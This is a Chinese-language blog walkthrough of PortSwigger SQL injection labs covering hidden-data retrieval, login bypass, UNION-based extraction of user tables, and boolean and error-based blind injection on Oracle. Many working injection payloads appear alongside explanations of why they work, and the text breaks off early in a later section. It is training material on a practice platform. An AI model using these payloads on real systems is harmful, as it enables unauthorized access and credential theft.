freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

burpsuite官方靶场之sql注入篇
2023-07-25 10:11:39
所属地 重庆

0.写在前面

免责声明:涉及到的所有技术仅用来学习交流,严禁用于非法用途,未经授权请勿非法渗透。否则产生的一切后果自行承担!

1.获取隐藏数据

1.1 达成目标

该靶场在产品目录的参数也就是category中存在sql注入,需要做的事是显示出未出售的产品。

# payload 

# sql的实例
select*fromproducts wherecategory='product name'andreleased =1

1.2 攻击步骤

该靶场是一个购物网站,罗列了在售卖的不同商品的价格

1690205517_64be7d4d8a3220dc3f77d.png!small?1690205518375

通过执行画框部分的搜索,来搜索数据库中对应的在售商品。

1690205539_64be7d63777b162519630.png!small?1690205540312

那么我们可以试着,利用sql注入获取隐藏的没有在售的商品:

第一步,利用burp抓取画框部分搜索相应商品的数据。

1690205638_64be7dc66736fd3e40baf.png!small?1690205639240

数据包如下图所示,观察该数据包发现我们所搜索的关键词放在了url的参数category里面。

1690205653_64be7dd577160fb488fa3.png!small?1690205654272

当放过该数据包,就搜索到了如下的商品。

1690205690_64be7dfae9c4162eef92c.png!small?1690205691594

第二步,尝试构造payload,返回所有的商品。

# payload
'+or+1=1--
# 产生sql注入的整个语句,这个payload相当返回的是所有的产品,不管是在售的还是未售的
SELECT * FROM products WHERE category = 'Gifts' OR 1=1--'ANDreleased =1

现在需要思考一个问题,为什么这里的payload偏偏是' or 1=1--,不是'and 1=1--也不是'--。如果换成了'and 1=1--,该靶场返回的数据只有Gifts的数据;而'--也是。

如果使用的是and构造的payload,那么前面的select * from products where category = 'Gifts'的查询结果和1=1取共同的数据,前面的select * from products where category = 'Gifts'所返回的就是关于Gifts的产品,而后面的1=1因为在数学上是一个恒等式,因此始终的结果是true。那么一个是部分查询结果,一个是true,取交集也就是关于Gifts的产品数据(不管是已售的还是未售的)。

and从数学角度来看就是交集。从计算机的boolean类型来看:

true and true = true

true and false =false

false and false =false

# payload
'and 1=1--

# payload+sql原句
select * from products where category = 'Gifts' and 1=1--'andreleased =1

如果使用的是'--,这样造成的效果是“--”前面的select查询语句正常执行,而--' and released = 1 被注释掉,这样返回的结果就是关于Gifts的产品数据(不管是已售的还是未售的)。

# payload
'--

# payload+sql原句
select * from products where category = 'Gifts'--'andreleased =1

现在再回过头来看这个靶场的答案,也就是'or 1=1--。or和and是不一样的,从数学的角度来解释,or是并集,and是交集。

从计算机的boolean类型来看:

true or true = true

true or false = true

false or false = false

# payload
' or 1=1--

# payload+sql原句
select * from products where category = 'Gifts' or 1=1--'andreleased =1

综上,该靶场的payload,也就是' or 1=1--所达成的效果就是查询该网站全部的产品,不管是在售的还是未售的。

至此,还需要确定一件事情就是,or和and这两个关键词拼接在sql语句里所达成的效果,或者说是由or或者and关键词拼接恒等式1=1所导致的查询效果,再换句话说,为什么‘or 1=1--这个payload会导致查询的结果就是全部的产品数据呢?

在弄清出这个问题之前,需要先弄清楚sql语句的执行顺序(见下一节,补充资料)

select*fromproducts wherecategory ='Gifts'or1=1--' and released = 1 

# 第一步,执行from products

# 第二步,执行where子句
"where子句,在这个子句中,category = 'Gifts'所查询到的就是关于Gifts的产品数据,而1=1就是1。
那相当于就是select * from products where category = 'Gifts'的结果和select * from products where 1的结果取交集
,前面的是部分结果,后面返回的是全部的结果,因此最后取的是全部的结果"
where category = 'Gifts' or 1=1

# 第三步,执行select查询,最后得出了全部的产品数据

1690205737_64be7e29acf829de8a358.png!small?1690205738466

成功返回所有商品。

1690205749_64be7e358d5127c105310.png!small?1690205751481

1.3 补充资料

下图为sql语句执行顺序

1690205770_64be7e4a68ad19ee87a07.png!small?1690205770980

1.4 参考文档

sql语句执行顺序:

https://blog.csdn.net/dz77dz/article/details/115111559

sql语句中的or和and:

https://blog.csdn.net/yang1234567898/article/details/122216635


2.万能密码攻击

2.1 达成目标

在应用程序的登录界面成功使用administrator账户成功登录即可。

2.2 攻击步骤

和上一个案例一样,还是一个购物网站,但是注意观察右边的画框部分有一个账户的功能。

1690205966_64be7f0e154b479b6343a.png!small?1690205968133

点击跳转到如下页面。

1690205978_64be7f1aec074c72e0245.png!small?1690205979631

试试administrator账号+万能密码攻击

# payload
# 该payload的'用来和sql原句的'进行闭合,之后的--则是用来注释后面的sql语句
administrator'--

# payload+sql原句
SELECT * FROM users WHERE username = 'administrator'--'ANDpassword=''

1690205992_64be7f2899066f0660154.png!small?1690205993244


3.sql注入UNION攻击

3.1 确定列的数量

3.1.1 达成目标

在该靶场中,该靶场的category参数存在注入,此次需要达成的目标就是确定该参数所涉及的查询的列数。

3.1.2 攻击步骤

还是之前的商品网站,通过点击画框的地方进行搜索,就可以搜索到相应的商品。

1690206014_64be7f3e05269ca0d8047.png!small?1690206014649

如下就是搜索的结果,可以看出搜索所传递的参数在url上面,参数名为category1690206033_64be7f515ec025db9bda9.png!small?1690206034112


可以大胆猜测出这肯定是执行了一个select where类型的sql查询,所传递的参数就在where所限定的参数值

# 猜测的sql语句
selectcommodity,price fromtable1 wherecategory=''

现如今我们需要做的就是探查出select的sql语句到底查询了几列数据。


方法一

第一步,对搜索商品进行抓包。

1690206055_64be7f6775dcda994c317.png!small?1690206056105

第二步,对category参数值插入相应的payload

# payload
'+union+select+null--
'+union+select+null,null--
'+union+select+null,null,null--

1690206070_64be7f76215059381ebaf.png!small?1690206070744


方法二

第一步,还是对商品的搜索进行抓包。

1690206081_64be7f816b28e05d0bb0e.png!small?1690206082037

第二步,插入相应的payload来确定其列数。

# payload
'+order+by+1--
'+order+by+2--
'+order+by+3--

1690206187_64be7feb080bdb0f3913b.png!small?1690206187718

3.1.3 补充资料

在打这个靶场前,阅读了burp官方相关的资料。对于union攻击,有几点需要注意:

  1. 当使用union攻击的时候,存在注入的地方必须原sql语句是select语句,这就需要对应用程序的功能进行分析判断。在sql语句中,union的作用就是合并多个查询语句的查询结果。

  2. 当使用union攻击的时候,需要注意拼接的sql语句的列数得和sql原句列数保持一致。

  3. 当使用union攻击的时候,还需要注意拼接的sql语句的列的数据类型的和sql原句的列的数据类型保持一致。

凡事要问为什么:

  1. 为什么拼接的sql语句列数得和sql原句列数保持一致?

  2. 为什么拼接的sql语句的列的数据类型和sql原句的列的数据类型的保持一致?


在这里,回答第一个问题。

union要求列数要一致,其实是因为在数据库之中的表结构的要求(具体可百度);如果列数不一致,就破坏了标准的表结构要求。简单来说,如果一个查询结果是只有两列的表,一个是三列的表,那么当使用了union,多出来的列又怎么处理。这就导致完全不知道如何合并;会导致前面说的表结构混乱;所表达的语义也不清不楚;也会产生错误无效的数据。


对于这个确定其列的数量,其能达到此效果的payload分为以下两类:

# payload

# 第一个
'+order+by+1--
# 第二个
'+union+select+null--

那么为什么,这两个payload就可以得出其列的数量呢?

先说第一个,第一个payload('+order+by+1--)的意思就是对select语句的第一列结果集进行排序;order by 2就是对第二列进行排序...以此类推,那么当n(order by n)超过了原本的select语句的列的数量,那么就会报错,解释其n的数字超过了select语句本身的列数。报错内容大致如下:

# 报错内容
The ORDER BY position number 3 is out of range of the number of items in the select list.

那么现在说第二个payload('union+select+null--)。这个payload正如前面所说的,在union语句里面,是要求前后的select语句的列数和类型是一致的,因此可以添加不同数量的null来进行列数的判断,当null的数量超过了前面的select语句的列数,就会导致报错。报错内容大致如下:

# 报错内容
All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists.

3.1.4 参考文档

表结构:

https://zhidao.baidu.com/question/157011604.html


3.2 确定列的类型

3.2.1 达成目标

该靶场的注入点在category参数,需要确定其数据的类型,并且往其注入靶场给定的字符串。

3.2.2 攻击步骤

还是一样的界面,就不赘述了。

1690206256_64be8030857f755738b8a.png!small?1690206257112

传参也是一样的

1690206264_64be80389c744750f3776.png!small?1690206265427

对此进行抓包,并且插入payload。

数据包如下

1690206298_64be805ab6814308183b8.png!small?1690206299431

# payload

# 第一步,确定有几列数据
'+union+select+null--
'+union+select+null,null--
'+union+select+null,null,null--

这是错误payload导致的结果,也就是上述的' union select null--和' union select null,null--

1690206378_64be80aa2f92c3bd9879b.png!small?1690206379003

下图代表该payload生效了

1690206421_64be80d503ad71de2b33c.png!small?1690206421591

# 第二步,确定数据的类型
'+union+select+'a',null,null--
'+union+select+null,'a',null--
'+union+select+null,null,'a'--

1690206447_64be80efe1955467fd366.png!small?1690206449003


注意:要提交给定的字符串

1690206457_64be80f9e78dec92c1ada.png!small?1690206458560

1690206464_64be8100976031dab92d7.png!small?1690206465262


3.2.3 补充资料

还记得在上一个靶场,也就是确定列的数量这个靶场所提到的union攻击所要满足的条件么。它的第三个条件写的是:当使用union攻击的时候,还需要注意拼接的sql语句的列的数据类型的和sql原句的列的数据类型保持一致。

现在,我们对这个条件进行讨论。

union要保持列的类型一致。如果列的类型不一致,这就会导致合并的不同数据类型的列无法确定其合并后是什么数据类型。比如一列是string,一列是int,那么把他们合并起来,无法确定其类型。

现在还有最后一个问题,正如前面所说,使用union得满足列数一致,类型一致,而第二个payload通过插入了大量的null来确定其列数,那么它又是如何保证其数据类型一致的呢? 在这里就需要了解一下在sql注入中null所产生的作用。

首先得弄清楚null在sql语句中的含义。其实一句话就可以解释清楚,null就是未知的意思。没错就是字面意义的不知道。

为了能够更好的理解null,也为了能够更好的区分null和空值的区别。因此还需要对此具体说明一下。

空值其实也是一个值,只不过它是空的。而null呢,它不存在什么空不空,它就是未知。不过这么说似乎有一点不好理解,那我直接上图图吧。

1690206480_64be8110095e206ff193b.png!small?1690206481084

不好意思,不是这个图图。

我们从空值和null值的长度的角度来理解。如图:

如下是不同空值的长度

1690206517_64be8135779ec23f0ad98.png!small?1690206518041

1690206524_64be813c4c6b52d98b2b5.png!small?1690206524782

可以看出,空值的长度是数值的。那么现在再来看看null的长度。

1690206583_64be8177126b49b469015.png!small?1690206583540

从上图可以看出,它的长度是null。就像最开始所说的,就是未知。


现在搞清楚了null的含义,那么现在需要弄清楚的是,这个未知的null值在sql注入中能发挥什么作用呢?

现在回想一下这个靶场的payload:

# payload
'+union+select+null,null--

# sql原句+payload
# 假设这两个col的数据类型是字符串
select col1,col2 from products where category = 'xxx' union select null,null--'

还记得之前说的么,使用union原句的时候得满足两边的select语句的列的数据类型是一样的,现在原句的列是字符串,而拼接的列是null,就像我之前所说的,null代表着未知的意思,那么它是怎么做到和前面的字符串的类型保持一致的呢?


因为null是可以被转换成任何数据类型的。这里就涉及到了数据库的隐式转换了。

新的问题又来了,什么是隐式转换,以及它的作用是什么?


首先回答什么是隐式转换:当不同类型的数据用运算符进行拼接的时候,数据类型优先级低的数据类型换转换成数据类型高的数据类型。

上面这句话可能有一点绕,直接举个例子就明白了。

1690206617_64be8199eccfa2ede0c90.png!small?1690206618402

从上图可以看出,在数据库中,整数1和字符串2相加,得到的结果是12。这说明,在这个sql语句中进行了隐式转换,它把整数转换成了字符串,然后进行了字符串的拼接。

而该靶场的payload中的null,就是可以在遇到运算符的时候,转换成不同的数据类型。

3.2.4 参考文档

数据库隐式转换

https://www.cnblogs.com/goloving/p/15222604.html

关于数据库中的null值

https://blog.csdn.net/lnotime/article/details/104847946

关于null可转换成其他数据类型这件事

《黑客攻防技术宝典 web实战篇》(第2版)P222


3.3 获取数据

3.3.1 达成目标

该靶场的注入点在category,需要做的就是,通过这个注入点,获取其users表的username和password列,获取其administrator账户的密码,然后进行登录即可。

3.3.2 攻击步骤

还是这样的一个购物网站,画框部分就是可以进行参数传递的地方。

1690206913_64be82c1c32f5f5b01e54.png!small?1690206915262


第一步,对该画框传参的地方进行抓包,确定有几列数据。

# payload
'+union+select+null--
'+union+select+null,null--

1690206935_64be82d772358b4831bdc.png!small?1690206936042

1690206956_64be82ec88f83897e050e.png!small?1690206957228

由此可以确定有两列数据。

第二步,确定每一列的数据类型。

# payload
'+union+select+'a',null--
'+union+select+'a','a'--

1690206973_64be82fda1199f30f2ae9.png!small?1690206974355

1690206985_64be830972fa18cd39b37.png!small?1690206986439

由此可以确定,有两列数据,并且均为字符串。

第三步,按照该靶场介绍所说,获取其用户表的用户名和密码。

1690207015_64be83273265fd9aad317.png!small?1690207016035

1690207029_64be83357b233d08e844d.png!small?1690207030487

发现了管理员的账户密码,然后尝试进行登录。

1690207037_64be833d2416fe00ec615.png!small?1690207037903

3.4 单个列返回多个值

3.4.1 达成目标

该靶场的注入点在category,需要做的就是,通过这个注入点,获取其users表的username和password列,获取其administrator账户的密码,然后进行登录即可。

3.4.2 攻击步骤

还是一样的商城网站,画框部分可以进行点击传参。

1690207131_64be839b973496c8acb63.png!small?1690207132641


第一步,确定这个传参的查询有多少列。

# payload
'+union+select+null,null--

1690207149_64be83ad001c2cc64d49c.png!small?1690207149769

1690207160_64be83b8c298811b916ea.png!small?1690207161533

第二步,确定每列数据的类型。

# payload
'+union+select+1,'a'--

1690207175_64be83c7a68381aa61147.png!small?1690207176593

1690207181_64be83cd980a1927a575e.png!small?1690207182407

第三步,获取users表的账号和密码。

# payload
'+union+select+username,password+from+users--

1690207194_64be83da5f83908f912af.png!small?1690207195227

由于该靶场表示是从单列获取多列数据,因此尝试如下攻击。

# payload
'union+select+null,
username+||+'~'+||+password+from+users--

1690207203_64be83e37a957f0b5ac3b.png!small?1690207204202

使用画框的账户进行登录。

1690207211_64be83ebbe2340f71df7b.png!small?1690207212806

3.4.3 补充资料

在sql注入中,如果遇到了,攻击者需要返回多列的数据,而该sql注入只查询了一列数据的时候该怎么办?

这个时候就需要把多列的数据给串联起来,在不同的数据中,串联的方法是不一样的。

# oracle
'col1'||'col2'

# Microsoft
'col1'+'col2'

# PostgreSQL
'col1'||'col2'

# Mysql
# 中间没空格
'col1''col2'
concat(col1,col2)


3.5 查询数据库类型和版本

3.5.1 Oracle

3.5.1.1 达成目标

获取其数据库版本

3.5.1.2 攻击步骤

还是一样的购物网站。点击画框部分可以进行输入。

1690207231_64be83ff3acbc72965d69.png!small?1690207231869


插入相应的payload。

# payload
'+union+select+null,banner+from+v$version

1690207242_64be840a9f42f01908c4c.png!small?1690207243247

1690207249_64be8411288b045e3e92a.png!small?1690207250501

3.5.2 Mysql or Microsoft

3.5.2.1 达成目标

获取其数据库版本

3.5.2.2 攻击步骤

一样的网站,话不多说直接开干。

1690207265_64be84217d1b434ffda0e.png!small?1690207266400

插入相应的payload。

# payload
'+union+select+null,@@version--

1690207273_64be8429c6aeb8f7f7746.png!small?1690207274492

1690207281_64be8431522db9e05aef9.png!small?1690207282999

3.6 列出数据库内容

3.6.1 非oracle

3.6.1.1 达成目标

获取其管理员密码进行登录

3.6.1.2 攻击步骤

还是一样的输入点

1690207484_64be84fc6d9ce0ab87d8c.png!small?1690207485524


第一步,先判断该sql查询语句有几列。

可以看出有两列内容。

# payload
'+union+select+null,null--

1690207500_64be850c2cf08503d58da.png!small?1690207500895

第二步,确定每列的数据类型。

# payload
'+union+select+'a','a'--

1690207520_64be852084dc6b0f4bcc3.png!small?1690207521043

可以得出,这两列都是字符串。

第三步,查询有哪些表。

# payload
'+union+select+table_name,'a'+from+information_schema.tables--

1690207531_64be852ba0c7a3d1721e5.png!small?1690207532330

浏览查询的表,发现了疑似保存有用户名密码的。

1690207781_64be86259eff3f00ea167.png!small?1690207782390

第四步,查询该表有那几列。

# payload
'+union+select+column_name,'a'+from+information_schema.columns+where+table_name='users_gipbpw'--

1690207804_64be863c60bca07d12396.png!small?1690207805221

发现有两列数据,可以看出一列是用户名,一列是密码。

1690207842_64be86622db81ae5c21af.png!small?1690207843214

第五步,查询用户名和密码。

# payload
'+union+select+username_kukssi,password_sfzwns+from+users_gipbpw--

1690208087_64be87578364f19215fee.png!small?1690208088224

成功发现管理员的密码。

1690208183_64be87b7e8e036f883c7b.png!small?1690208185036

最后,输入密码进行登录。

1690208201_64be87c9e8ec8522a090e.png!small?1690208202506

1690208207_64be87cfae07f335cb3c3.png!small?1690208208343

3.6.2 oracle

3.6.2.1 达成目标

获取其管理员密码进行登录

3.6.2.2 攻击步骤

废话不多说,直接开干。

1690208218_64be87da28f105f1524e0.png!small?1690208219221

第一步,确定该sql查询语句有几列。

# payload
'+union+select+null,null+from+dual--

1690208232_64be87e812a96a7930c4c.png!small?1690208233129

ps:需要注意的是在oracle里面,用了联合查询,那么就一定要加上from dual

第二步,确定每一列的数据类型。

# payload
'+union+select+'a','a'+from+dual--

1690208248_64be87f8a68b642f94fc0.png!small?1690208249440

由此可以得出,这两列数据是字符串。

第三步,罗列该数据库有哪些表格。

# payload
'+union+select+table_name,'a'+from+all_tables--

1690208264_64be8808e14dec3f416c0.png!small?1690208265623

1690208273_64be881199d1f33441e9e.png!small?1690208274521

第四步,罗列该表有那几列。

# payload
'+union+select+column_name,'a'+from+all_tab_columns+where+table_name='USERS_IAVHAZ'--

1690208447_64be88bf1ba246b612c0c.png!small?1690208447660

1690208464_64be88d0546e956a32ebf.png!small?1690208465683

最后一步,查询该表格的账户密码。

# payload
'union+select+USERNAME_ITGAOE,PASSWORD_DGDESM+from+USERS_IAVHAZ--

1690208552_64be89286a08cf138bd81.png!small?1690208553134

1690208560_64be89303f00620970f12.png!small?1690208561244

1690208567_64be893773450dfbaf161.png!small?1690208568093


4. 盲注

4.1 带条件响应的盲注

4.1.1 达成目标

该靶场的注入点在cookie的TrackingID,这个参数可以确定是否是已知的用户。在确定是否是已知用户的时候,肯定会有一个查询语句和sql注入进行交互。因此,需要利用这个参数,来进行sql盲注,从而获取其users表的administrator的密码,然后进行登录即可。

小提示:administrator的密码由小写字母和数字组成

4.1.2 攻击步骤

一样的注入点

1690208646_64be89867c5a0b47c01ca.png!small?1690208647663

第一步,因为这个靶场是盲注,因此,可以通过如下的payload来判断注入点。

# payload

# 查询始终为真
'and'1'='1

1690208668_64be899c34c4c4ab21df1.png!small?1690208668834

这里显示的Welcome back!

1690208683_64be89aba760b1f0a06b2.png!small?1690208684776

# payload

# 查询始终为假
'and'1'='2

1690208702_64be89bee2216a017ecfa.png!small?1690208703425

这里就没有Welcome back了

1690208711_64be89c750f3b23b714fe.png!small?1690208712503

由此可以判断出,这里是有注入点的,并且可以通过这个Welcome back来进行注入

第二步,通过注入获取密码。

# payload

# 在这里的关键就是使用了substring函数,这个函数用来提取字字符串
'and+substring((select+password+from+users+where+username='administrator'),1,1)='a

在intruder来进行批量暴破以此获取其密码。

1690208722_64be89d294dd3cd809887.png!small?1690208723452

使用对应的字典

1690208731_64be89db340058e033118.png!small?1690208731840

提取响应的相应关键词

1690208738_64be89e22320731a78d11.png!small?1690208738846

成功获取到了密码

1690208757_64be89f5866a3667121f4.png!small?1690208758152

密码:jdzux5p8791hxl7gejul

1690208763_64be89fbb5d65e0298308.png!small?1690208764825

4.1.3 补充资料

到现在为止,已经接触了sql注入显注和布尔盲注,也就是此靶场。有一个问题,为什么在显注里面,可以直接通过单引号之类的字符就可以判断其注入点,而在布尔盲注里面,必须得通过其and的方式来判断呢?

首先,先说一下sql显注,因为是显注,导致可以显示sql注入的报错信息,那么就可以构造一个导致报错的语句,从而观察其页面反应有没有sql报错即可,最经典的就是输入单引号。

但是对于布尔盲注是不行的了,因为它没有报错信息,并且sql查询的结果也没有回显。但是,它会返回真假两种状态。举个例子,比如这个靶场,如果sql语句最终为true,那么就会在页面上显示一个welcome back,如过为false,那么页面就不会显示这个welcome back。

至于为什么称为真假两个状态,是因为一般这种类型的sql语句,在开发阶段多少会涉及到if语句的。下面是一个存在sql盲注的案例:

<?php
$con = mysqli_connect('127.0.0.1','root','root','test');
if (mysqli_connect_errno())
{
echo "连接失败".mysqli_connect_error();
}
$id = $_GET['id'];
if (preg_match("/union|sleep|benchmark/i")){
exit("no");
}
$result = mysqli_query($con,"select * from user where id=".$id);
$row = mysqli_fetch_array($result);

# 这下面的关于if的代码就是基于能不能返回sql查询,来进行判断的;而if判断无非真假
if ($row){
exit("yes");
}else{
exit("no");
}
?>

现在把注意力在放到关于判断布尔盲注的payload上:

# 判断是否有布尔盲注的payload
'and+'1'='1
'and+'1'='2

在上述的payload中,因为使用了and,因此拼接起来的sql查询的返回结果注定是true或者false。因为1恒等于1,然后前面的原始sql查询是true,因此最终返回的结果肯定是true,因此在源代码if语句的判断条件就是true,所以就会返回带welcome back的页面;又因为1是不等于2的,导致最终返回的结果肯定是false,因此放在if的条件语句里面直接就是false,从而会返回不带welcome back的页面。

综上,上面的这两个payload其实就是控制sql语句的返回结果使其可以为true或者false,从而触发if不同的结果。

4.1.4 参考文档

sql注入源码:

https://blog.csdn.net/qq_32393893/article/details/109840298


4.2 带条件错误的盲注

4.2.1 达成目标

你需要做的是获取到users表里面的administrator用户的password,然后进行登录即可。需要注意的是,该靶场的数据库是oracle。

4.2.2 攻击步骤

还是一样的网站,一样的输入点。

1690208796_64be8a1c9b1ec8e28c9a6.png!small?1690208797600


第一步,判断是否有其注入点。

1690208804_64be8a243b1df78c708dc.png!small?1690208804778

出现了报错。

1690208810_64be8a2a131396aba5aed.png!small?1690208810920

1690208817_64be8a3173f68d15c6e3a.png!small?1690208817998

恢复正常显示。

1690208824_64be8a3808aa84d239a39.png!small?1690208825322

但是仅凭这点,是不能确定是否有注入点的,还需要进行进一步的确认。

# payload

# 执行一个空的查询
'||(select+''+from+dual)||'

1690208832_64be8a40e64a84fd661db.png!small?1690208833920

该页面是正常显示的

1690208840_64be8a4834d794a8f0d5d.png!small?1690208841226

# payload

# 因为是oracle数据库,因此涉及到的每一个select查询必须在后边跟上要查询的表
# 后面跟上的这个test表,是一个根本不存在的表,因此这个查询是肯定的会报错的
'||(select+''+from+test)||'

1690208853_64be8a55690ec0d0abe22.png!small?1690208854013

出现了报错,现在就是sql注入石锤了。

1690208880_64be8a703e8011fe5ca2e.png!small?1690208880746

第二步,利用这个条件错误,来提取数据库的关键信息。

# payload

# 探测users表是否存在
# rownum=1表示只返回users表的一行数据,因为这里的sql语句是类似于mysql concat,可以防止返回很多行数据从而破坏合并查询
'||(select+''+from+users+where+rownum=1)||'

由此可以确定users表是存在的

1690208892_64be8a7cf2a6de21def52.png!small?1690208894407


当然,也可以利用下面的payload来进行注入点的判断。

# payload

# 相当于python里面的if语句
# case when(condition) then ...(true) else ...(false) end
'||(select+case+when+(1=1)+then+to_char(1/0)+else+''+end+from+dual)||'

1690208907_64be8a8b7879add555e36.png!small?1690208908194

因为1始终等于1,因此就会导致除零错误。

1690208918_64be8a969561c7b992894.png!small?1690208919346

# payload
'||(select+case+when(1=2)+then+to_char(1/0)+else+''+end+from+dual)||'

1690208929_64be8aa1245c2e40aa8ca.png!small?1690208929774

正常返回

1690208937_64be8aa981bd35406db8d.png!small?1690208938678

第三步,继续提取我们想要的信息,也就是获取到administrator的密码。

# payload
'||(select+case+when+(1=1)+then+to_char(1/0)+else+''+end+from+users+where+username='administrator')||'

1690208950_64be8ab6357715b770a6d.png!small?1690208951087

1690208958_64be8abe2b69e18302ae3.png!small?1690208959129

# payload
'||(select+case+when+(1=2)+then+to_char(1/0)+else+''+end+from+users+where+username='administrator')||'

1690208971_64be8acb966d08db9e2ca.png!small?1690208972508

1690208981_64be8ad5d8a4b42901916.png!small?1690208982746

由此可以确定users表里面是有administrator账户的。

接下来就需要确定下,administrator的密码长度。

# payload
'||(select+case+when+length(password)=1+then+to_char(1/0)+else+''+end+from+users+where+username='administrator')||'

选择使用暴破的方式来获取administrator的密码长度。

1690208991_64be8adf9ae920f253924.png!small?1690208992399

可以确定,密码长度为20

1690208997_64be8ae5781fc390a9326.png!small?1690208998585

接下来就是最后的环节,也就是猜测密码。

# payload
'||(select+case+when+(substr(password,1,1)='a')+then+to_char(1/0)+else+''+end+from+users+where+username='administrator')||'

1690209004_64be8aec52c1b7420f39d.png!small?1690209004882

密码:n8l3czfh44pxa8ts6vlb

1690209009_64be8af1aa00f443e006c.png!small?1690209010510

4.2.3 补充资料

对于上述的一系列的攻击,其实笔者存在好几个问题:

第一个问题,在攻击的最开始,使用了单引号来判断注入点,payload如下:

# 原参数值+payload

TrackingID'
TrackingID''

上述的payload会导致web页面相应出现截然不同的结果,第一个payload会导致页面返回500状态码,而第二个payload会导致页面返回200状态码。但是这并不能确定该处就存在sql注入,这是为什么呢?

首先通过单引号注入能判断sql注入这个情况是出现在sql显注里面,也就是说,必须的保证单引号能引出页面返回明显的sql语法错误,这才能确定其是存在sql注入的。

但是现在这个靶场它是不会有回显的,该靶场的逻辑是:如果输入正常的sql字符,那么就会正常返回对应的数据;如果输入非正常的字符,比如单引号,就会导致其500错误,但是这个500错误并未显示其sql语法错误,只显示了一个内部服务错误。

1690209097_64be8b49f2e28c1eea311.png!small?1690209098790

但是输入第二个payload,也就是'',就会正常返回页面。在这里只能说是两个单引号使其闭合了,因此能正常访问。放在真实网站里面,由于完全是处于黑盒状态的,因此并不能石锤有sql注入,因为可能网站对单引号进行了过滤或者转义,或者是不是有安全防护。


第二个问题,也就是接下来的攻击步骤:

# payload

# 执行一个空的查询
'||(select+''+from+dual)||'

为什么不可以借鉴上一个靶场的payload来对sql注入进行判断呢?

直接试试该payload的效果就知道了:

1690209161_64be8b89536c8e3e38b1f.png!small?1690209162049

1690209172_64be8b94ec01cca0ed2f7.png!small?1690209173673

可以看出并未达到想要的效果。


第三个问题,那么是怎么通过'||(select+''+from+dual)||'和接下来的'||(select+''+from+ajfij124)||'来判断出这就是个sql注入的?

# payload

'||(select+''+from+dual)||'
'||(select+''+from+ajfij124)||'

当执行上面的第一个payload的时候,网站响应200状态码,网页正常显示。这说明了一个问题,这个sql语句,生效了,而且使用了dual,因此可以证明这是个oracle数据库(就像在前面的达成目标所说的)。

当执行上面的第二个payload的时候,网站响应500状态码,网页不能正常显示。这是因为我们的from后面接的是一个根本不存在的表ajfij124,因此会报错。

由此可以得出,这个地方肯定是有sql注入的。

在第一个payload中,也就是'||(select+''+from+dual)||',这个dual是个什么意思?(没错,我就是好奇宝宝)

首先,可以肯定的是,这个数据库是oracle,在oracle中,它对sql语法的要求更加严格,是不允许select ' '的存在的,因为这会使得oracle产生歧义,因此必须的指定一个表明才能使得查询正常运行。但是现在的情况就是,我根本不知道有什么表啊(呜呜呜~~~),因此dual就出现了。

dual到底是个什么东西?为什么会出现dual,dual能做什么?

dual存在于oracle中,它是一个单行单列的表格,如下图所示:

1690209198_64be8bae69935bb95304f.png!small?1690209198959

那么为什么oracle中会存在这个表格,以及它能够做什么?

首先,它是一个安装oracle后,就存在的表格,在正常用途之中,可以用它来测试一个sql语句,但是又没有数据支撑。


除了上述的payload可以对注入点进行石锤之外,还可以通过如下的payload来对注入点进行石锤。

# payload

'||(select+case+when+(1=1)+then+to_char(1/0)+else+''+end+from+dual)||'
'||(select+case+when+(1=2)+then+to_char(1/0)+else+''+end+from+dual)||'

为什么可以肯定的是,上述的payload也可以对该注入点进行石锤?

首先,我们得弄清楚上述的payload的所表达的意思:上述的payload产生的效果其实大致相当于python里的if语句所达成的效果,你要说你不知道if语句是个啥意思,那么如下图可以做解释:

1690209223_64be8bc79177fcf3ff37a.png!small?1690209224920

需要注意的是,sql语句里面的语法和python里面的语法是有出入的。

在上述的payload也就是sql语句中,它的“if”语句的语法解释如下:

# payload
'||(select+case+when+(1=1)+then+to_char(1/0)+else+''+end+from+dual)||'

# 语法
case col_name when(condition) then ... else ... end

# 解释
# case后面跟的是涉及到的列名,这个列名不一定要有,然后when就相当于是if,后面跟上条件判断,then就是条件结果为true的情况下所执行的语句,else是条件为假的情况下所执行的语句,end就是表示条件判断结束。

# 对于payload的说明
# 该payload所表达的意思就是,1=1条件为true,因此执行1/0,导致出现了除零错误

在该处的payload还有一个细节需要注意,也就是在1/0这里使用了一个函数,该函数就是to_char,to_char的作用在于把数值型转换为字符串类型。

现在弄清楚了to_char是什么,那么还需要弄清楚的是,为什么在这里要用to_char函数以及发挥了什么作用?

首先在回答这个问题之前,我们需要复习一下sql语句的执行顺序,以该payload为例:

# payload

'||select case when (1=1) then to_char(1/0) else '' end from dual||'

第一步,执行from dual,也就是获取dual表,dual是个单行单列的表格。

第二步,执行case when ...语句。首先判断条件1=1,因为为true,因此执行to_char(1/0)。到这里会先执行1/0,报除零错误,然后再执行to_char函数把报错转换为字符串,以免sql语句在这里因为除零错误未执行完导致报错。

第三步,把该错误信息,封装到case,然后最后传递给select进行执行,最终导致报错。

综上得出,to_char的函数的作用以及它为什么存在,就是为了让sql语句能继续执行。而且,因为使用了||,此符号是用来拼接字符串的。因此也必须得符合字符串这一条件。


最后在观察后续的payload

# payload

'||(select+case+when+(substr(password,1,1)='a')+then+to_char(1/0)+else+''+end+from+users+where+username='administrator')||'
'||(select+case+when+length(password)=1+then+to_char(1/0)+else+''+end+from+users+where+username='administrator')||'
'||(select+case+when+(substr(password,1,1)='a')+then+to_char(1/0)+else+''+end+from+users+where+username='administrator')||'

通过观察发现,上述的payload的,都使用了case when...结构,以及to_char(1/0)。

该靶场的payload的思想,或者说报错盲注的思想其实就是,通过显注的sql语法错误和case when条件判断相搭配,以此来操控页面是否报错,从而通过这种方式来达到获取数据的目的。

4.2.4 参考文档

关于oracle to_char函数

https://www.cnblogs.com/aipan/p/7941917.html

在线oracle

https://livesql.oracle.com


4.3 冗余错误盲注

4.3.1 达成目标

你需要做的是获取到users表里面的administrator用户的password,然后进行登录即可。

4.3.2 攻击步骤

一样的网站,一样的注入点

1690209249_64be8be19c90cf087b87d.png!small?1690209250517

第一步,判断注入点。

1690209272_64be8bf832c96e4b9c758.png!small?1690209272930

